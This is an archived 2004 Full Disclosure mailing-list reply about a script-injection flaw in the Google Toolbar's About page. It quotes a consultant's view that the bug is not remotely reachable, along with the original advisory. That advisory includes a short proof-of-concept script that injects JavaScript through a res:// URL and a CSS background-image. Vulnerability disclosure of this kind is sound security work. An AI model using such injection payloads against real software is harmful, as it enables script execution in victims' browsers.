Full Disclosure mailing list archives
Re: GoogleToolbar:About -- Allows Script Injection
From: Liu Die Yu <liudieyu () umbrella name>
Date: Sun, 19 Sep 2004 09:55:20 +0800
i agree with the-insider :-) Rafel Ivgi, The-Insider wrote:
This is not dangerous from remote, because the "res:" protocol is not accessible by internet zone. You must to find a way to access "res:" from remote, otherwise it means nothing. As for local zone, you can ran scripts in mycomputer zone. Rafel Ivgi, The-Insider Security Consultant, Finjan.com----- Original Message ----- From: "ViPeR" <viper31337 () yahoo co in>To: <news () securiteam com>; <bugtraq () securityfocus com>; <bugs () securitytracker com>; <vulnwatch () vulnwatch org>; <vuln () security nnov ru>; <sec-adv () secunia com>; <submissions () packetstormsecurity org> Sent: Friday, September 17, 2004 10:51 AM Subject: GoogleToolbar:About -- Allows Script Injection Affection Software : GoogleToolbar Version : Tested on 2.0.114.1-big/en (GGLD) Notes: GoogleToolbar's About section allows injection of script, since it lacks any checking. The following code is a Proof Of Concept. <s c r i p t> window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dl l/ABOUT.HTML", "<div style=\"background-image: url(javascript:alert(location.href));\">"); </s c r i p t> rgds, Gregory R. Panakkal / Viper ________________________________________________________________________ Yahoo! India Matrimony: Find your life partner online Go to: http://yahoo.shaadi.com/india-matrimony .
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: GoogleToolbar:About -- Allows Script Injection Rafel Ivgi, The-Insider (Sep 18)
- Re: GoogleToolbar:About -- Allows Script Injection Liu Die Yu (Sep 19)
- <Possible follow-ups>
- Re: GoogleToolbar:About -- Allows Script Injection ViPeR (Sep 19)